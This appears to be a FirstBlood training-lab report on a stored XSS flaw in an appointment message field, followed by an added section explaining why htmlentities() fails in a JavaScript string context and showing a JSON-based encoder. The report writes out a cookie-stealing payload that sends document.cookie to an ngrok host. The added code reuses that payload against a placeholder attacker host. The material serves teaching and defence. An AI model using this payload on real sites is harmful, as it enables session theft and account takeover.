FirstBlood-#666 — Stored XSS via message field on MANAGE APPOINTMENT
This issue was discovered on FirstBlood v2
On 2021-10-27, newrouge Level 3 reported:
Hey, I found that the message parameter is vulnerable to stored XSS, and it affects all users visiting the manage appointment page with our appointment ID.
Steps:
- The user's message was reflected inside the msg='hello user' variable in a JS context.
- As we learned on Barker, it is possible to get XSS in a JS context by using arithmetic operators, i.e. '-alert(1)-'.
- Make an appointment with the message: '-alert(1)-'
- Now copy the appointment ID and retrieve your appointment on Manage Appointment. The XSS will execute.
- Now let's try to steal admin or any user's cookies with this payload in the message field:
test';document.location.href=`http://c1bb-45-118-159-250.ngrok.io/${document.cookie}`;a='test
It becomes:
<script>msg='test';document.location.href=`http://c1bb-45-118-159-250.ngrok.io/${document.cookie}`;a='test'</script>
It closes the msg='' variable, then puts in our payload with document.cookie, and lastly a='test' closes the quote appended by the program at the end.
- Now when you send your manage appointment URL to the victim, the XSS will execute in his context and the cookies will be sent to your server.
https://1cec34382c6a-newrouge.a.firstbloodhackers.com/manageappointment.php?success&aptid=3a03d769-7570-4b54-82c5-2fdb2b750d85 , send this URL to the victim. Your server gets the victim's cookies.
Thank you
newrouge
P2 High
Endpoint: /manageappointment.php?success&aptid=3a03d769-7570-4b54-82c5-2fdb2b750d85
Parameter: message=
Payload: test';document.location.href=`http://c1bb-45-118-159-250.ngrok.io/${document.cookie}`;a='test
FirstBlood ID: 22
Vulnerability Type: Stored XSS
Whilst an attempt was made to fix the stored XSS vulnerability in managing an appointment, it actually introduced new issues, such as when creating and editing an appointment and not just when cancelling it. Making use of htmlentities() and relying on .value() in JavaScript to encode certain characters does not prevent XSS overall. The 'fix' to this issue also results in it being vulnerable to admins on cancelled appointments as well.
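The root cause in the report is that the server drops user data straight into a JavaScript string literal inside a <script> block, and the closing note explains why htmlentities() alone is not a fix: HTML entity encoding is the wrong encoder for a JS string context (with PHP's pre-8.1 default flags it does not even touch the single quote that the report's payload uses to close msg=''). The example below is added here and is not code from FirstBlood or from the reporter; the helper names htmlEntitiesCompat, escapesSingleQuotedLiteral, jsStringLiteral and renderMessageScript are assumptions, and the sample payload is the report's shape with the callback host replaced by a placeholder. It contrasts the weak encoding with a context-appropriate serialiser that keeps the message as data no matter what it contains.

```javascript
// Added example (not FirstBlood code): encoding user data for an inline
// <script> string context. Helper names are hypothetical.

// Approximation of PHP htmlentities() with its pre-8.1 default flags
// (ENT_COMPAT): & " < > are encoded, but the single quote is NOT.
function htmlEntitiesCompat(s) {
  return s.replace(/&/g, '&amp;').replace(/"/g, '&quot;')
          .replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

// Static check: does the string still contain a quote that is not
// backslash-escaped, i.e. one that would terminate a '...' literal?
function escapesSingleQuotedLiteral(s) {
  return /(^|[^\\])'/.test(s);
}

// Context-correct serialisation for a JS string inside <script>.
// JSON.stringify already escapes \ " and control characters; on top of
// that we hex-escape < > & ' and the line terminators U+2028/U+2029, so
// neither a raw quote nor a literal </script> can ever appear in the
// output. This mirrors PHP's json_encode($v, JSON_HEX_TAG | JSON_HEX_AMP
// | JSON_HEX_APOS | JSON_HEX_QUOT), which is the usual fix on the server.
function jsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(/[<>&'\u2028\u2029]/g, (c) =>
    '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// How a hardened manage-appointment page would emit the message: the
// value is always a double-quoted literal, whatever the user typed.
function renderMessageScript(message) {
  return '<script>var msg=' + jsStringLiteral(message) + ';</script>';
}

// Constructed sample in the shape of the report's payload; the ngrok host
// from the report is replaced by a placeholder.
const PAYLOAD =
  "test';document.location.href=`http://ATTACKER-HOST.example/${document.cookie}`;a='test";

// Weak encoding leaves the quote intact, so the literal can still be closed.
console.log('htmlentities breaks out of literal:',
            escapesSingleQuotedLiteral(htmlEntitiesCompat(PAYLOAD)));
// Correct encoding: no raw quote, and the browser reads back exactly the
// original text as data.
console.log('jsStringLiteral breaks out of literal:',
            escapesSingleQuotedLiteral(jsStringLiteral(PAYLOAD)));
console.log(renderMessageScript(PAYLOAD));
```

The round-trip property is the thing to test in a regression suite: JSON.parse(jsStringLiteral(x)) must equal x for every x, which is only possible if nothing in x was interpreted as syntax. Moving the message out of the inline script altogether (for example into a data-* attribute read with dataset, or into a JSON blob in a <script type="application/json"> element) avoids the JS-string context entirely and is the cleaner long-term design.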